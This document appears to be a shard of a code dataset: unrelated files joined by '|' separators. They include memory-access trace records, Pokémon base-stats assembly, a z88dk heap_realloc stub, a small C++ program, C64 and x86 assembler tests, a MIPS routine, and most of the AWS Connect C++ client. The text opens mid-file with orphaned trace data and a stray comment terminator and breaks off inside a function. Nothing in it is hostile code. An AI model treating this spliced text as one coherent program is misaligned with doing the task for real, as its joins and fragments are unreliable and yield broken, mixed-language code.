{'OP': 'STOR', 'dst': {'same': False, 'congruent': 2, 'NT': False, 'type': 'addresses_WC_ht', 'size': 32, 'AVXalign': False}}
{'OP': 'STOR', 'dst': {'same': True, 'congruent': 4, 'NT': False, 'type': 'addresses_UC_ht', 'size': 1, 'AVXalign': False}}
{'src': {'type': 'addresses_A_ht', 'congruent': 6, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_WT_ht', 'congruent': 8, 'same': False}}
{'src': {'type': 'addresses_A_ht', 'congruent': 0, 'same': False}, 'OP': 'REPM', 'dst': {'type': 'addresses_D_ht', 'congruent': 7, 'same': False}}
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 7, 'NT': False, 'type': 'addresses_A_ht', 'size': 1, 'AVXalign': False}}
{'src': {'same': False, 'congruent': 0, 'NT': False, 'type': 'addresses_UC_ht', 'size': 4, 'AVXalign': False}, 'OP': 'LOAD'}
{'OP': 'STOR', 'dst': {'same': False, 'congruent': 8, 'NT': True, 'type': 'addresses_D_ht', 'size': 32, 'AVXalign': False}}
{'00': 92}
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
*/
|
db 0 ; species ID placeholder
db 40, 65, 95, 35, 60, 45
; hp atk def spd sat sdf
db POISON, POISON ; type
db 190 ; catch rate
db 114 ; base exp
db NO_ITEM, NO_ITEM ; items
db GENDER_F0 ; gender ratio
db 100 ; unknown 1
db 20 ; step cycles to hatch
db 5 ; unknown 2
INCBIN "gfx/pokemon/koffing/front.dimensions"
db 0, 0, 0, 0 ; padding
db GROWTH_MEDIUM_FAST ; growth rate
dn EGG_INDETERMINATE, EGG_INDETERMINATE ; egg groups
; tm/hm learnset
tmhm CURSE, ROLLOUT, TOXIC, ZAP_CANNON, HIDDEN_POWER, SUNNY_DAY, SNORE, PROTECT, ENDURE, FRUSTRATION, THUNDER, RETURN, DOUBLE_TEAM, SWAGGER, SLEEP_TALK, SLUDGE_BOMB, FIRE_BLAST, REST, ATTRACT, THIEF, FLAMETHROWER, THUNDERBOLT
; end
|
; void *heap_realloc(void *heap, void *p, size_t size)
INCLUDE "clib_cfg.asm"
SECTION code_alloc_malloc
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
IF __CLIB_OPT_MULTITHREAD & $01
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
PUBLIC _heap_realloc
EXTERN asm_heap_realloc
_heap_realloc:
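; pop the return address and the three arguments into registers, then push
; everything back so the stack is unchanged for the tail jump below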
pop af
pop de
pop hl
pop bc
push bc
push hl
push de
push af
jp asm_heap_realloc
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
ELSE
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
PUBLIC _heap_realloc
EXTERN _heap_realloc_unlocked
defc _heap_realloc = _heap_realloc_unlocked
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
ENDIF
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
#include <iostream>
#include <stdio.h>
using namespace std;
int main()
{
    freopen("input.txt", "r", stdin);   // redirect stdin to the input file
    int n;
    cin >> n;
    int *mas = new int[n];              // initial counter for each position
    for (int i = 0; i < n; ++i)
        cin >> mas[i];
    int c, t;
    cin >> c;
    for (int i = 0; i < c; ++i)         // apply c decrements (1-based positions)
    {
        cin >> t;
        --mas[t - 1];
    }
    for (int i = 0; i < n; ++i)         // "yes" where a counter went negative
    {
        if (mas[i] >= 0) cout << "no" << endl;
        else cout << "yes" << endl;
    }
    delete[] mas;                       // free the buffer
    return 0;
} |
// Tests (non-)optimization of constant pointers to pointers
// The two uses of &screen are not detected as identical, leading to ASM that could be optimized further
// Commodore 64 PRG executable file
.file [name="ptrptr-optimize-2.prg", type="prg", segments="Program"]
.segmentdef Program [segments="Basic, Code, Data"]
.segmentdef Basic [start=$0801]
.segmentdef Code [start=$80d]
.segmentdef Data [startAfter="Code"]
.segment Basic
:BasicUpstart(main)
.segment Code
main: {
.label screen = 2
// byte* screen = (char*)0x400
lda #<$400
sta.z screen
lda #>$400
sta.z screen+1
// sub('a',&screen)
lda #'a'
jsr sub
// sub('b',&screen)
lda #'b'
jsr sub
// }
rts
}
// void sub(__register(A) char ch, char **dst)
sub: {
// *(*dst)++ = ch
ldy.z main.screen
sty.z $fe
ldy.z main.screen+1
sty.z $ff
ldy #0
sta ($fe),y
// *(*dst)++ = ch;
inc.z main.screen
bne !+
inc.z main.screen+1
!:
// }
rts
}
|
BITS 32
;TEST_FILE_META_BEGIN
;TEST_TYPE=TEST_F
;TEST_IGNOREFLAGS=
;TEST_FILE_META_END
; SETL
mov ecx, 0x111
mov ebx, 0x010
cmp ecx, ebx
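; signed compare: 0x111 > 0x010, so setl is expected to leave al = 0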
;TEST_BEGIN_RECORDING
setl al
;TEST_END_RECORDING
|
.data
msg1:.asciiz "Dwse to plithos: "    # Greek (transliterated): "Enter the count: "
msg2:.asciiz "Dwse ton aritmhmo: " # "Enter the number: "
.align 2
pin1: .space 100
.text
.globl main
main:
addi $v0,$0,4        # syscall 4: print string
la $a0,msg1
syscall
addi $v0,$0,5        # syscall 5: read int
syscall
add $t0,$v0,0        # $t0 = how many values follow
addi $v0,$0,4        # print msg2
la $a0,msg2
syscall
addi $v0,$0,5        # read the reference number
syscall
add $s2,$v0,0
addi $s2,$s2,1       # $s2 = number + 1, so "slt < $s2" below tests <= number
addi $t4,$0,0        # $t4 = loop counter
addi $t3,$0,0        # $t3 = array offset (cleared explicitly instead of relying on simulator zeroing)
addi $s1,$0,0        # $s1 = result accumulator (likewise cleared)
loop1:
addi $v0,$0,5        # read the next value
syscall
add $t1,$0,$v0
sw $t1,pin1($t3)     # pin1[i] = value
addi $t3,$t3,4
addi $t4,$t4,1
blt $t4,$t0,loop1
la $a0,pin1          # $a0 = array base
move $a1,$t0         # $a1 = element count
move $a2,$s1
jal func             # count the elements <= number into $s1
move $a0,$s1         # print the count
li $v0,1             # syscall 1: print int
syscall
##exit##
li $v0,10            # syscall 10: exit
syscall
func:
addi $sp,$sp,-8
sw $ra,4($sp)
lw $t5,($a0)
addi $a1,$a1,-1
slt $t2,$t5,$s2
sw $t2,0($sp)
bne $a1,$0,L1
jr $ra
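# base case returns without restoring $sp; each pending frame is then unwound
# at LL below, adding its saved slt result to $s1, until the outermost saved
# $ra finally returns to main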
L1:
addi $a0,$a0,4
jal func
LL:
lw $t2,0($sp)
lw $ra,4($sp)
addi $sp,$sp,8
add $s1,$t2,$s1
jr $ra
|
/*
* Copyright 2010-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License").
* You may not use this file except in compliance with the License.
* A copy of the License is located at
*
* http://aws.amazon.com/apache2.0
*
* or in the "license" file accompanying this file. This file is distributed
* on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
* express or implied. See the License for the specific language governing
* permissions and limitations under the License.
*/
#include <aws/core/utils/Outcome.h>
#include <aws/core/auth/AWSAuthSigner.h>
#include <aws/core/client/CoreErrors.h>
#include <aws/core/client/RetryStrategy.h>
#include <aws/core/http/HttpClient.h>
#include <aws/core/http/HttpResponse.h>
#include <aws/core/http/HttpClientFactory.h>
#include <aws/core/auth/AWSCredentialsProviderChain.h>
#include <aws/core/utils/json/JsonSerializer.h>
#include <aws/core/utils/memory/stl/AWSStringStream.h>
#include <aws/core/utils/threading/Executor.h>
#include <aws/core/utils/DNS.h>
#include <aws/core/utils/logging/LogMacros.h>
#include <aws/connect/ConnectClient.h>
#include <aws/connect/ConnectEndpoint.h>
#include <aws/connect/ConnectErrorMarshaller.h>
#include <aws/connect/model/CreateUserRequest.h>
#include <aws/connect/model/DeleteUserRequest.h>
#include <aws/connect/model/DescribeUserRequest.h>
#include <aws/connect/model/DescribeUserHierarchyGroupRequest.h>
#include <aws/connect/model/DescribeUserHierarchyStructureRequest.h>
#include <aws/connect/model/GetContactAttributesRequest.h>
#include <aws/connect/model/GetCurrentMetricDataRequest.h>
#include <aws/connect/model/GetFederationTokenRequest.h>
#include <aws/connect/model/GetMetricDataRequest.h>
#include <aws/connect/model/ListContactFlowsRequest.h>
#include <aws/connect/model/ListHoursOfOperationsRequest.h>
#include <aws/connect/model/ListPhoneNumbersRequest.h>
#include <aws/connect/model/ListQueuesRequest.h>
#include <aws/connect/model/ListRoutingProfilesRequest.h>
#include <aws/connect/model/ListSecurityProfilesRequest.h>
#include <aws/connect/model/ListTagsForResourceRequest.h>
#include <aws/connect/model/ListUserHierarchyGroupsRequest.h>
#include <aws/connect/model/ListUsersRequest.h>
#include <aws/connect/model/StartChatContactRequest.h>
#include <aws/connect/model/StartOutboundVoiceContactRequest.h>
#include <aws/connect/model/StopContactRequest.h>
#include <aws/connect/model/TagResourceRequest.h>
#include <aws/connect/model/UntagResourceRequest.h>
#include <aws/connect/model/UpdateContactAttributesRequest.h>
#include <aws/connect/model/UpdateUserHierarchyRequest.h>
#include <aws/connect/model/UpdateUserIdentityInfoRequest.h>
#include <aws/connect/model/UpdateUserPhoneConfigRequest.h>
#include <aws/connect/model/UpdateUserRoutingProfileRequest.h>
#include <aws/connect/model/UpdateUserSecurityProfilesRequest.h>
using namespace Aws;
using namespace Aws::Auth;
using namespace Aws::Client;
using namespace Aws::Connect;
using namespace Aws::Connect::Model;
using namespace Aws::Http;
using namespace Aws::Utils::Json;
static const char* SERVICE_NAME = "connect";
static const char* ALLOCATION_TAG = "ConnectClient";
ConnectClient::ConnectClient(const Client::ClientConfiguration& clientConfiguration) :
BASECLASS(clientConfiguration,
Aws::MakeShared<AWSAuthV4Signer>(ALLOCATION_TAG, Aws::MakeShared<DefaultAWSCredentialsProviderChain>(ALLOCATION_TAG),
SERVICE_NAME, clientConfiguration.region),
Aws::MakeShared<ConnectErrorMarshaller>(ALLOCATION_TAG)),
m_executor(clientConfiguration.executor)
{
init(clientConfiguration);
}
ConnectClient::ConnectClient(const AWSCredentials& credentials, const Client::ClientConfiguration& clientConfiguration) :
BASECLASS(clientConfiguration,
Aws::MakeShared<AWSAuthV4Signer>(ALLOCATION_TAG, Aws::MakeShared<SimpleAWSCredentialsProvider>(ALLOCATION_TAG, credentials),
SERVICE_NAME, clientConfiguration.region),
Aws::MakeShared<ConnectErrorMarshaller>(ALLOCATION_TAG)),
m_executor(clientConfiguration.executor)
{
init(clientConfiguration);
}
ConnectClient::ConnectClient(const std::shared_ptr<AWSCredentialsProvider>& credentialsProvider,
const Client::ClientConfiguration& clientConfiguration) :
BASECLASS(clientConfiguration,
Aws::MakeShared<AWSAuthV4Signer>(ALLOCATION_TAG, credentialsProvider,
SERVICE_NAME, clientConfiguration.region),
Aws::MakeShared<ConnectErrorMarshaller>(ALLOCATION_TAG)),
m_executor(clientConfiguration.executor)
{
init(clientConfiguration);
}
ConnectClient::~ConnectClient()
{
}
void ConnectClient::init(const ClientConfiguration& config)
{
m_configScheme = SchemeMapper::ToString(config.scheme);
if (config.endpointOverride.empty())
{
m_uri = m_configScheme + "://" + ConnectEndpoint::ForRegion(config.region, config.useDualStack);
}
else
{
OverrideEndpoint(config.endpointOverride);
}
}
void ConnectClient::OverrideEndpoint(const Aws::String& endpoint)
{
if (endpoint.compare(0, 7, "http://") == 0 || endpoint.compare(0, 8, "https://") == 0)
{
m_uri = endpoint;
}
else
{
m_uri = m_configScheme + "://" + endpoint;
}
}
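/* Minimal usage sketch (illustrative only; the region and instance id are
   placeholder values, and Aws::InitAPI is assumed to have been called):

       Aws::Client::ClientConfiguration config;
       config.region = "us-east-1";
       ConnectClient client(config);

       Model::ListUsersRequest req;
       req.SetInstanceId("your-instance-id");
       auto outcome = client.ListUsers(req);
       if (outcome.IsSuccess())
       {
           const auto& result = outcome.GetResult();
       }
*/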
CreateUserOutcome ConnectClient::CreateUser(const CreateUserRequest& request) const
{
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("CreateUser", "Required field: InstanceId, is not set");
return CreateUserOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/users/";
ss << request.GetInstanceId();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_PUT, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return CreateUserOutcome(CreateUserResult(outcome.GetResult()));
}
else
{
return CreateUserOutcome(outcome.GetError());
}
}
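/* All operations below follow the same three-part pattern: the synchronous
   method builds the request URI and returns an Outcome; the Callable variant
   wraps that call in a std::packaged_task and returns its std::future; the
   Async variant schedules a helper on m_executor that invokes the caller's
   handler with the outcome. */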
CreateUserOutcomeCallable ConnectClient::CreateUserCallable(const CreateUserRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< CreateUserOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->CreateUser(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::CreateUserAsync(const CreateUserRequest& request, const CreateUserResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->CreateUserAsyncHelper( request, handler, context ); } );
}
void ConnectClient::CreateUserAsyncHelper(const CreateUserRequest& request, const CreateUserResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, CreateUser(request), context);
}
DeleteUserOutcome ConnectClient::DeleteUser(const DeleteUserRequest& request) const
{
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("DeleteUser", "Required field: InstanceId, is not set");
return DeleteUserOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
if (!request.UserIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("DeleteUser", "Required field: UserId, is not set");
return DeleteUserOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [UserId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/users/";
ss << request.GetInstanceId();
ss << "/";
ss << request.GetUserId();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_DELETE, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return DeleteUserOutcome(NoResult());
}
else
{
return DeleteUserOutcome(outcome.GetError());
}
}
DeleteUserOutcomeCallable ConnectClient::DeleteUserCallable(const DeleteUserRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< DeleteUserOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->DeleteUser(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::DeleteUserAsync(const DeleteUserRequest& request, const DeleteUserResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->DeleteUserAsyncHelper( request, handler, context ); } );
}
void ConnectClient::DeleteUserAsyncHelper(const DeleteUserRequest& request, const DeleteUserResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, DeleteUser(request), context);
}
DescribeUserOutcome ConnectClient::DescribeUser(const DescribeUserRequest& request) const
{
if (!request.UserIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("DescribeUser", "Required field: UserId, is not set");
return DescribeUserOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [UserId]", false));
}
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("DescribeUser", "Required field: InstanceId, is not set");
return DescribeUserOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/users/";
ss << request.GetInstanceId();
ss << "/";
ss << request.GetUserId();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_GET, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return DescribeUserOutcome(DescribeUserResult(outcome.GetResult()));
}
else
{
return DescribeUserOutcome(outcome.GetError());
}
}
DescribeUserOutcomeCallable ConnectClient::DescribeUserCallable(const DescribeUserRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< DescribeUserOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->DescribeUser(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::DescribeUserAsync(const DescribeUserRequest& request, const DescribeUserResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->DescribeUserAsyncHelper( request, handler, context ); } );
}
void ConnectClient::DescribeUserAsyncHelper(const DescribeUserRequest& request, const DescribeUserResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, DescribeUser(request), context);
}
DescribeUserHierarchyGroupOutcome ConnectClient::DescribeUserHierarchyGroup(const DescribeUserHierarchyGroupRequest& request) const
{
if (!request.HierarchyGroupIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("DescribeUserHierarchyGroup", "Required field: HierarchyGroupId, is not set");
return DescribeUserHierarchyGroupOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [HierarchyGroupId]", false));
}
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("DescribeUserHierarchyGroup", "Required field: InstanceId, is not set");
return DescribeUserHierarchyGroupOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/user-hierarchy-groups/";
ss << request.GetInstanceId();
ss << "/";
ss << request.GetHierarchyGroupId();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_GET, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return DescribeUserHierarchyGroupOutcome(DescribeUserHierarchyGroupResult(outcome.GetResult()));
}
else
{
return DescribeUserHierarchyGroupOutcome(outcome.GetError());
}
}
DescribeUserHierarchyGroupOutcomeCallable ConnectClient::DescribeUserHierarchyGroupCallable(const DescribeUserHierarchyGroupRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< DescribeUserHierarchyGroupOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->DescribeUserHierarchyGroup(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::DescribeUserHierarchyGroupAsync(const DescribeUserHierarchyGroupRequest& request, const DescribeUserHierarchyGroupResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->DescribeUserHierarchyGroupAsyncHelper( request, handler, context ); } );
}
void ConnectClient::DescribeUserHierarchyGroupAsyncHelper(const DescribeUserHierarchyGroupRequest& request, const DescribeUserHierarchyGroupResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, DescribeUserHierarchyGroup(request), context);
}
DescribeUserHierarchyStructureOutcome ConnectClient::DescribeUserHierarchyStructure(const DescribeUserHierarchyStructureRequest& request) const
{
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("DescribeUserHierarchyStructure", "Required field: InstanceId, is not set");
return DescribeUserHierarchyStructureOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/user-hierarchy-structure/";
ss << request.GetInstanceId();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_GET, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return DescribeUserHierarchyStructureOutcome(DescribeUserHierarchyStructureResult(outcome.GetResult()));
}
else
{
return DescribeUserHierarchyStructureOutcome(outcome.GetError());
}
}
DescribeUserHierarchyStructureOutcomeCallable ConnectClient::DescribeUserHierarchyStructureCallable(const DescribeUserHierarchyStructureRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< DescribeUserHierarchyStructureOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->DescribeUserHierarchyStructure(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::DescribeUserHierarchyStructureAsync(const DescribeUserHierarchyStructureRequest& request, const DescribeUserHierarchyStructureResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->DescribeUserHierarchyStructureAsyncHelper( request, handler, context ); } );
}
void ConnectClient::DescribeUserHierarchyStructureAsyncHelper(const DescribeUserHierarchyStructureRequest& request, const DescribeUserHierarchyStructureResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, DescribeUserHierarchyStructure(request), context);
}
GetContactAttributesOutcome ConnectClient::GetContactAttributes(const GetContactAttributesRequest& request) const
{
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("GetContactAttributes", "Required field: InstanceId, is not set");
return GetContactAttributesOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
if (!request.InitialContactIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("GetContactAttributes", "Required field: InitialContactId, is not set");
return GetContactAttributesOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InitialContactId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/contact/attributes/";
ss << request.GetInstanceId();
ss << "/";
ss << request.GetInitialContactId();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_GET, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return GetContactAttributesOutcome(GetContactAttributesResult(outcome.GetResult()));
}
else
{
return GetContactAttributesOutcome(outcome.GetError());
}
}
GetContactAttributesOutcomeCallable ConnectClient::GetContactAttributesCallable(const GetContactAttributesRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< GetContactAttributesOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->GetContactAttributes(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::GetContactAttributesAsync(const GetContactAttributesRequest& request, const GetContactAttributesResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->GetContactAttributesAsyncHelper( request, handler, context ); } );
}
void ConnectClient::GetContactAttributesAsyncHelper(const GetContactAttributesRequest& request, const GetContactAttributesResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, GetContactAttributes(request), context);
}
GetCurrentMetricDataOutcome ConnectClient::GetCurrentMetricData(const GetCurrentMetricDataRequest& request) const
{
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("GetCurrentMetricData", "Required field: InstanceId, is not set");
return GetCurrentMetricDataOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/metrics/current/";
ss << request.GetInstanceId();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_POST, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return GetCurrentMetricDataOutcome(GetCurrentMetricDataResult(outcome.GetResult()));
}
else
{
return GetCurrentMetricDataOutcome(outcome.GetError());
}
}
GetCurrentMetricDataOutcomeCallable ConnectClient::GetCurrentMetricDataCallable(const GetCurrentMetricDataRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< GetCurrentMetricDataOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->GetCurrentMetricData(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::GetCurrentMetricDataAsync(const GetCurrentMetricDataRequest& request, const GetCurrentMetricDataResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->GetCurrentMetricDataAsyncHelper( request, handler, context ); } );
}
void ConnectClient::GetCurrentMetricDataAsyncHelper(const GetCurrentMetricDataRequest& request, const GetCurrentMetricDataResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, GetCurrentMetricData(request), context);
}
GetFederationTokenOutcome ConnectClient::GetFederationToken(const GetFederationTokenRequest& request) const
{
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("GetFederationToken", "Required field: InstanceId, is not set");
return GetFederationTokenOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/user/federate/";
ss << request.GetInstanceId();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_GET, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return GetFederationTokenOutcome(GetFederationTokenResult(outcome.GetResult()));
}
else
{
return GetFederationTokenOutcome(outcome.GetError());
}
}
GetFederationTokenOutcomeCallable ConnectClient::GetFederationTokenCallable(const GetFederationTokenRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< GetFederationTokenOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->GetFederationToken(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::GetFederationTokenAsync(const GetFederationTokenRequest& request, const GetFederationTokenResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->GetFederationTokenAsyncHelper( request, handler, context ); } );
}
void ConnectClient::GetFederationTokenAsyncHelper(const GetFederationTokenRequest& request, const GetFederationTokenResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, GetFederationToken(request), context);
}
GetMetricDataOutcome ConnectClient::GetMetricData(const GetMetricDataRequest& request) const
{
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("GetMetricData", "Required field: InstanceId, is not set");
return GetMetricDataOutcome(Aws::Client::AWSError<ConnectErrors>(ConnectErrors::MISSING_PARAMETER, "MISSING_PARAMETER", "Missing required field [InstanceId]", false));
}
Aws::Http::URI uri = m_uri;
Aws::StringStream ss;
ss << "/metrics/historical/";
ss << request.GetInstanceId();
uri.SetPath(uri.GetPath() + ss.str());
JsonOutcome outcome = MakeRequest(uri, request, Aws::Http::HttpMethod::HTTP_POST, Aws::Auth::SIGV4_SIGNER);
if(outcome.IsSuccess())
{
return GetMetricDataOutcome(GetMetricDataResult(outcome.GetResult()));
}
else
{
return GetMetricDataOutcome(outcome.GetError());
}
}
GetMetricDataOutcomeCallable ConnectClient::GetMetricDataCallable(const GetMetricDataRequest& request) const
{
auto task = Aws::MakeShared< std::packaged_task< GetMetricDataOutcome() > >(ALLOCATION_TAG, [this, request](){ return this->GetMetricData(request); } );
auto packagedFunction = [task]() { (*task)(); };
m_executor->Submit(packagedFunction);
return task->get_future();
}
void ConnectClient::GetMetricDataAsync(const GetMetricDataRequest& request, const GetMetricDataResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
m_executor->Submit( [this, request, handler, context](){ this->GetMetricDataAsyncHelper( request, handler, context ); } );
}
void ConnectClient::GetMetricDataAsyncHelper(const GetMetricDataRequest& request, const GetMetricDataResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context) const
{
handler(this, request, GetMetricData(request), context);
}
ListContactFlowsOutcome ConnectClient::ListContactFlows(const ListContactFlowsRequest& request) const
{
if (!request.InstanceIdHasBeenSet())
{
AWS_LOGSTREAM_ERROR("ListContactFlows", "Required field: InstanceId, is not set");
